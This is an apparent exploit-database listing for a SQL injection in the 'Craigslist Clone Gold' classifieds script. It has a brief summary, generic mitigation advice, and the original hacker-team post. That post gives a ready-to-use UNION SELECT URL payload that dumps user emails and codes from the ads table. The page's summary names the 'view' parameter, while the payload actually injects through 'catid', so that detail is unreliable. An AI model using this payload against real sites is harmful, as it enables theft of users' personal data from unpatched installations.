header-logo
Suggest Exploit
vendor:
Craigslist Clone Gold
by:
Fallaga
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Craigslist Clone Gold
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Demo
2013

Craigslist Clone Gold SQL injection Vulnerability

This exploit allows an attacker to perform SQL injection on the Craigslist Clone Gold script. By manipulating the 'view' parameter in the URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database. The specific payload used in the exploit is '-1 union select concat(email,0x3a,code) from clf_ads--'.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in SQL queries or use prepared statements with parameterized queries. Regular security updates and patches should also be applied to the Craigslist Clone Gold script.
Source

Exploit-DB raw data:

# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability
# Date: 04/05/2013
# Author: Fallaga
# Team: FaLLaGa Tunisian Hackers
#Script url:
http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html
# Version: N/A
# Tested on: Demo
# CVE : ()
############################################################
#######################



#########################[ EXPL0!T ]#########################


http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads--



#############################SwT 4 Ever##########################
####################


@JaMbA !!  GreeTz: Fallaga Team + all tunisian people